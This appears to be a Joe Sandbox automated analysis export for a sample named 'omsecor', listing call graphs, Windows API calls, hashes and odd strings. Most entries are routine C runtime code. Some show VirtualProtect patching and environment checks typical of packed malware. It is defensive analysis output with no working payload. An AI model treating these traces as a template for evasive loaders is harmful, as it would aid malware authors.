4706->4708 4707->4708 4713 4046f9 4708->4713 4711 4022f7 _raise 67 API calls 4710->4711 4712 4023f7 4711->4712 4714 404706 4713->4714 4715 4046ff 4713->4715 4714->4704 4717 403416 RtlLeaveCriticalSection 4715->4717 4717->4714 4718 401e76 GetModuleHandleA 4719 401e91 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4718->4719 4720 401e88 4718->4720 4722 401edb TlsAlloc 4719->4722 4751 401bca 4720->4751 4725 401ff5 4722->4725 4726 401f29 TlsSetValue 4722->4726 4726->4725 4727 401f3a 4726->4727 4762 402419 4727->4762 4730 401aaa __init_pointers 67 API calls 4731 401f4a 4730->4731 4732 401aaa __init_pointers 67 API calls 4731->4732 4733 401f5a 4732->4733 4734 401aaa __init_pointers 67 API calls 4733->4734 4735 401f6a 4734->4735 4736 401aaa __init_pointers 67 API calls 4735->4736 4737 401f7a 4736->4737 4769 403378 4737->4769 4740 401ff0 4741 401bca __mtterm 70 API calls 4740->4741 4741->4725 4742 401b21 _raise 67 API calls 4743 401f9b 4742->4743 4743->4740 4744 404032 __calloc_crt 67 API calls 4743->4744 4745 401fb4 4744->4745 4745->4740 4746 401b21 _raise 67 API calls 4745->4746 4747 401fce 4746->4747 4747->4740 4748 401fd5 4747->4748 4749 401c07 _raise 67 API calls 4748->4749 4750 401fdd GetCurrentThreadId 4749->4750 4750->4725 4752 401bd4 4751->4752 4753 401be0 4751->4753 4755 401b21 _raise 67 API calls 4752->4755 4754 401bf4 TlsFree 4753->4754 4756 401c02 4753->4756 4754->4756 4755->4753 4757 4033db RtlDeleteCriticalSection 4756->4757 4758 4033f3 4756->4758 4759 403f64 ___free_lconv_mon 67 API calls 4757->4759 4760 403405 RtlDeleteCriticalSection 4758->4760 4761 401e8d 4758->4761 4759->4756 4760->4758 4763 401b18 _raise 67 API calls 4762->4763 4764 40241f __init_pointers 4763->4764 4773 404106 4764->4773 4767 401aaa __init_pointers 67 API calls 4768 401f3f 4767->4768 4768->4730 4770 403381 4769->4770 4771 404763 ___crtInitCritSecAndSpinCount 67 API calls 4770->4771 4772 401f87 4770->4772 4771->4770 4772->4740 4772->4742 4774 401aaa __init_pointers 67 API calls 4773->4774 4775 402451 4774->4775 4775->4767 4776 401877 4777 401886 4776->4777 4778 40188c 4776->4778 4779 4023ea _raise 67 API calls 4777->4779 4782 40240a 4778->4782 4779->4778 4781 401891 _raise 4783 4022f7 _raise 67 API calls 4782->4783 4784 402415 4783->4784 4784->4781 4785 4027fa 4786 402807 4785->4786 4790 40280c _strlen 4785->4790 4787 403f46 ___initmbctable 111 API calls 4786->4787 4787->4790 4788 402818 4789 404032 __calloc_crt 67 API calls 4797 40283f _strlen 4789->4797 4790->4788 4790->4789 4791 40289a 4792 403f64 ___free_lconv_mon 67 API calls 4791->4792 4792->4788 4793 404032 __calloc_crt 67 API calls 4793->4797 4794 4028bf 4795 403f64 ___free_lconv_mon 67 API calls 4794->4795 4795->4788 4796 404bcb _strcpy_s 67 API calls 4796->4797 4797->4788 4797->4791 4797->4793 4797->4794 4797->4796 4798 404121 __invoke_watson 10 API calls 4797->4798 4798->4797 4799 4023fb 4800 4022f7 _raise 67 API calls 4799->4800 4801 402406 4800->4801 4884 40213b SetUnhandledExceptionFilter 3989 402f3e HeapCreate 3990 402f61 3989->3990 3991 402f5e 3989->3991 3998 402ee3 3990->3998 3994 402f94 3997 402f7f HeapDestroy 3997->3991 3999 4021f2 ___crtInitCritSecAndSpinCount 67 API calls 3998->3999 4000 402efa 3999->4000 4001 402f09 4000->4001 4002 404121 __invoke_watson 10 API calls 4000->4002 4003 402229 _raise 67 API calls 4001->4003 4002->4001 4004 402f15 4003->4004 4005 402f24 4004->4005 4006 404121 __invoke_watson 10 API calls 4004->4006 4005->3994 4007 405045 RtlAllocateHeap 4005->4007 4006->4005 4008 402f7a 4007->4008 4008->3994 4008->3997 4802 4020fe 4803 402136 4802->4803 4805 40210c 4802->4805 4805->4803 4806 4040cd 4805->4806 4807 4040d9 _raise 4806->4807 4808 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4807->4808 4810 4040de 4808->4810 4809 406a50 _abort 69 API calls 4811 404100 _raise 4809->4811 4810->4809 4811->4803

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 90 4012c0-4012e8 FindFirstFileA call 401080
                          APIs
                          • FindFirstFileA.KERNELBASE(ks clku .d,24468419), ref: 004012DD
                            • Part of subcall function 00401080: GetTickCount.KERNEL32 ref: 00401096
                            • Part of subcall function 00401080: GetDesktopWindow.USER32 ref: 004010B8
                            • Part of subcall function 00401080: GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                            • Part of subcall function 00401080: GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?), ref: 0040114B
                            • Part of subcall function 00401080: GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                            • Part of subcall function 00401080: GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopFileFindFirstGlobalNameTickTimesWindow
                          • String ID: ks clku .d
                          • API String ID: 973805369-4096487313
                          • Opcode ID: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction ID: 8201e92c16030f82e268503128fd01f75d7624b5287a074f0a6a6b49dcde2be8
                          • Opcode Fuzzy Hash: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction Fuzzy Hash: 13C012701042448FC330AF24DE0ABAA37E4AB48300F00093AA5E8E60A4DA3455598A8A

                          Control-flow Graph

                          APIs
                          • GetTickCount.KERNEL32 ref: 00401096
                          • GetDesktopWindow.USER32 ref: 004010B8
                          • GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                          • GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                          • GetCurrentProcess.KERNEL32(?), ref: 0040114B
                          • GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                          • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                          • GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          • cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp, xrefs: 00401131
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopGlobalNameTickTimesWindow
                          • String ID: cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp
                          • API String ID: 509927810-2920797944
                          • Opcode ID: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction ID: 30898c1c04428891cb82ceb7e239a2b08516cd6c9376f1465321758e23d54b14
                          • Opcode Fuzzy Hash: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction Fuzzy Hash: E55127F1D041744BDB288B298D54BB9BBF5ABC5305F0881BEE689B7381D5385A48CF28

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 17 407a98-407a9f GetModuleHandleA 18 407aa1-407ab0 call 407ab5 17->18 19 407adf 17->19 29 407ab2-407abd GetProcAddress 18->29 30 407b17 18->30 20 407ae1-407ae5 19->20 22 407b24 call 407b29 20->22 23 407ae7-407aef GetModuleHandleA 20->23 26 407af1-407af9 23->26 26->26 28 407afb-407afe 26->28 28->20 31 407b00-407b02 28->31 29->19 33 407abf-407acc VirtualProtect 29->33 32 407b18-407b20 30->32 36 407b04-407b06 31->36 37 407b08-407b10 31->37 41 407b22 32->41 34 407ade 33->34 35 407ace-407adc VirtualProtect 33->35 34->19 35->34 39 407b11-407b12 GetProcAddress 36->39 37->39 39->30 41->28
                          APIs
                          • GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407AB5: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 53099f65029657388ac4b193d9ffb221688749bb3c6439a8311ebbe5e3b7996f
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: B501CC00F4D24539DA2051754C0197F7AA89A533687141677A111B72D3D9BCBE0692BF

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 42 407a59-407a6e 43 407a70-407a78 42->43 44 407adf 42->44 43->44 46 407a7a-407aa8 call 407a98 43->46 45 407ae1-407ae5 44->45 47 407b24 call 407b29 45->47 48 407ae7-407aef GetModuleHandleA 45->48 54 407aaa 46->54 55 407b1e-407b20 46->55 51 407af1-407af9 48->51 51->51 53 407afb-407afe 51->53 53->45 56 407b00-407b02 53->56 57 407aac-407ab0 54->57 58 407b0d-407b10 54->58 59 407b22 55->59 60 407b18-407b1d 55->60 61 407b04-407b06 56->61 62 407b08-407b0c 56->62 65 407b17 57->65 66 407ab2-407abd GetProcAddress 57->66 63 407b11-407b12 GetProcAddress 58->63 59->53 60->55 61->63 62->58 63->65 65->60 66->44 67 407abf-407acc VirtualProtect 66->67 68 407ade 67->68 69 407ace-407adc VirtualProtect 67->69 68->44 69->68
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407A98: GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                            • Part of subcall function 00407A98: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 8932c9a1b40894ead954c0166dfb712feb6fdadac19e13bdf209ed336a7ac0e8
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: DE21F621A4D2416EEB2186B44C0166B7BE49B13368F1946A7D141EB2C3D1BC7D4687AB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 70 407ab5-407abd GetProcAddress 71 407adf 70->71 72 407abf-407acc VirtualProtect 70->72 75 407ae1-407ae5 71->75 73 407ade 72->73 74 407ace-407adc VirtualProtect 72->74 73->71 74->73 76 407b24 call 407b29 75->76 77 407ae7-407aef GetModuleHandleA 75->77 79 407af1-407af9 77->79 79->79 80 407afb-407afe 79->80 80->75 81 407b00-407b02 80->81 82 407b04-407b06 81->82 83 407b08-407b10 81->83 84 407b11-407b17 GetProcAddress 82->84 83->84 87 407b18-407b20 84->87 89 407b22 87->89 89->80
                          APIs
                          • GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 39b30828dda2cca0c429c80848ec8113aa03dbdf6ed959677c669bf53de2d5ad
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 98F0F400E8D2043CEE2151B40C01ABBBBEC86633687241A27A211E72C3D4BC7E0692BB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 93 402f3e-402f5c HeapCreate 94 402f61-402f6e call 402ee3 93->94 95 402f5e-402f60 93->95 98 402f70-402f7d call 405045 94->98 99 402f94-402f97 94->99 98->99 102 402f7f-402f92 HeapDestroy 98->102 102->95
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,004017AC,00000001), ref: 00402F4F
                          • HeapDestroy.KERNEL32 ref: 00402F85
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CreateDestroy
                          • String ID:
                          • API String ID: 3296620671-0
                          • Opcode ID: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction ID: 98ebcd61208b82bef51758d9ec37e8992e6abd11400b15b10fa3614edeb5f36b
                          • Opcode Fuzzy Hash: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction Fuzzy Hash: D3E092706643029EEB40AB31AF0D72636E4E74078AF10843BF548F51E2EBBC8605AF4C
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 004020B3
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004020C8
                          • UnhandledExceptionFilter.KERNEL32(00408204), ref: 004020D3
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 004020EF
                          • TerminateProcess.KERNEL32(00000000), ref: 004020F6
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction ID: b20ca496c67c0111f9bdb02fdd2caa8760b953d18a2e8655b2b95bf976f6fc72
                          • Opcode Fuzzy Hash: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction Fuzzy Hash: 5321AEB5950304DFC710EF24EF48A453BB5BF88306F10403AE549B36A1E7B859A59F9E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 103 402465-40246f 104 402471-402478 103->104 105 402480-402483 104->105 106 40247a-40247e 104->106 107 402600-402604 105->107 108 402489-402495 call 404c30 105->108 106->104 106->105 111 40249b-4024a5 call 404c30 108->111 112 4025cc-4025d8 GetStdHandle 108->112 118 4024b4-4024ba 111->118 119 4024a7-4024ae 111->119 114 4025da-4025dd 112->114 115 4025ff 112->115 114->115 117 4025df-4025f9 call 404b40 WriteFile 114->117 115->107 117->115 118->115 122 4024c0-4024db call 404bcb 118->122 119->112 119->118 125 4024ea-402506 GetModuleFileNameA 122->125 126 4024dd-4024e7 call 404121 122->126 128 402508-40251d call 404bcb 125->128 129 40252e-402539 call 404b40 125->129 126->125 128->129 137 40251f-40252b call 404121 128->137 135 402573 129->135 136 40253b-402560 call 404b40 call 404a82 129->136 139 402575-402586 call 404a11 135->139 136->135 151 402562-402571 call 404121 136->151 137->129 146 402595-4025a8 call 404a11 139->146 147 402588-402592 call 404121 139->147 155 4025b7-4025ca call 404854 146->155 156 4025aa-4025b4 call 404121 146->156 147->146 151->139 155->115 156->155
                          APIs
                          • _strcpy_s.LIBCMT ref: 004024D1
                          • __invoke_watson.LIBCMT ref: 004024E2
                          • GetModuleFileNameA.KERNEL32(00000000,0040B091,00000104), ref: 004024FE
                          • _strcpy_s.LIBCMT ref: 00402513
                          • __invoke_watson.LIBCMT ref: 00402526
                          • _strlen.LIBCMT ref: 0040252F
                          • _strlen.LIBCMT ref: 0040253C
                          • __invoke_watson.LIBCMT ref: 00402569
                          • _strcat_s.LIBCMT ref: 0040257C
                          • __invoke_watson.LIBCMT ref: 0040258D
                          • _strcat_s.LIBCMT ref: 0040259E
                          • __invoke_watson.LIBCMT ref: 004025AF
                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77735E70,00000003,00402631,000000FC,0040667C,00000001,00000000,00000000,?,00403FFF,?,00000001), ref: 004025CE
                          • _strlen.LIBCMT ref: 004025EF
                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00403FFF,?,00000001,?,00403478,00000018,004093D0,0000000C,00403507,?), ref: 004025F9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 1879448924-4022980321
                          • Opcode ID: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction ID: 3ad8829dabe9c8e6b7970468b651ade891dcb41a26c93daa50347fadcc2e15d8
                          • Opcode Fuzzy Hash: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction Fuzzy Hash: CF3127B2A402153AE62136326F5EF2F314C9B91315F14013BFE09B26D6FABD9A1441FE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 162 401e76-401e86 GetModuleHandleA 163 401e91-401ed9 GetProcAddress * 4 162->163 164 401e88-401e90 call 401bca 162->164 166 401ef1-401f10 163->166 167 401edb-401ee2 163->167 170 401f15-401f23 TlsAlloc 166->170 167->166 169 401ee4-401eeb 167->169 169->166 171 401eed-401eef 169->171 172 401ff5 170->172 173 401f29-401f34 TlsSetValue 170->173 171->166 171->170 174 401ff7-401ff9 172->174 173->172 175 401f3a-401f89 call 402419 call 401aaa * 4 call 403378 173->175 188 401ff0 call 401bca 175->188 189 401f8b-401fa6 call 401b21 175->189 188->172 189->188 194 401fa8-401fba call 404032 189->194 194->188 197 401fbc-401fd3 call 401b21 194->197 197->188 201 401fd5-401fee call 401c07 GetCurrentThreadId 197->201 201->174
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,004017BE), ref: 00401E7C
                          • __mtterm.LIBCMT ref: 00401E88
                            • Part of subcall function 00401BCA: TlsFree.KERNEL32(00000002,00401FF5), ref: 00401BF5
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004033DC
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000002), ref: 00403406
                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00401E9E
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00401EAB
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00401EB8
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00401EC5
                          • TlsAlloc.KERNEL32 ref: 00401F15
                          • TlsSetValue.KERNEL32(00000000), ref: 00401F30
                          • __init_pointers.LIBCMT ref: 00401F3A
                          • __calloc_crt.LIBCMT ref: 00401FAF
                          • GetCurrentThreadId.KERNEL32 ref: 00401FDF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 2125014093-3819984048
                          • Opcode ID: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction ID: 2b6f412a48510a2ea5e28321b190ff4220801d9e6bfc04da0c4d4af9d52f3434
                          • Opcode Fuzzy Hash: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction Fuzzy Hash: AF318F319483029BE7146F75AF05B063AA5AF40355712053FF861B22F5EF7C8490EB5E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 204 404854-404876 call 401b18 207 40492a-404934 204->207 208 40487c-40488b LoadLibraryA 204->208 211 404936-40493c 207->211 212 4049af-4049b7 207->212 209 404891-4048a1 GetProcAddress 208->209 210 404a0a 208->210 209->210 215 4048a7-4048e9 call 401aaa GetProcAddress call 401aaa GetProcAddress call 401aaa call 4021f2 209->215 216 404a0c-404a10 210->216 211->212 217 40493e-404957 call 401b21 * 2 211->217 213 4049b9-4049c2 call 401b21 212->213 214 4049ea-4049f8 call 401b21 212->214 213->214 227 4049c4-4049cb 213->227 214->210 226 4049fa-404a08 214->226 244 4048f8-4048fc 215->244 245 4048eb-4048f5 call 404121 215->245 217->212 232 404959-40495b 217->232 226->216 227->214 237 4049cd-4049d5 227->237 232->212 236 40495d-404961 232->236 246 404963-404974 236->246 247 40497c-404988 call 402229 236->247 237->214 239 4049d7-4049e0 call 401b21 237->239 239->214 252 4049e2-4049e7 239->252 244->207 250 4048fe-404914 GetProcAddress call 401aaa 244->250 245->244 246->247 258 404976-40497a 246->258 259 404997-40499b 247->259 260 40498a-404994 call 404121 247->260 250->207 264 404916-404925 GetProcAddress call 401aaa 250->264 252->214 258->212 258->247 262 4049a6-4049ad 259->262 263 40499d-4049a4 259->263 260->259 262->214 263->214 264->207
                          APIs
                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00404881
                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040489D
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048BA
                            • Part of subcall function 00401AAA: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                            • Part of subcall function 00401AAA: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048CF
                          • __invoke_watson.LIBCMT ref: 004048F0
                            • Part of subcall function 00404121: _memset.LIBCMT ref: 004041AD
                            • Part of subcall function 00404121: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004041CB
                            • Part of subcall function 00404121: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004041D5
                            • Part of subcall function 00404121: UnhandledExceptionFilter.KERNEL32(0040B078,?,?,00000000), ref: 004041DF
                            • Part of subcall function 00404121: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004041FA
                            • Part of subcall function 00404121: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00404201
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401B21: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                            • Part of subcall function 00401B21: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00404904
                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040491C
                          • __invoke_watson.LIBCMT ref: 0040498F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
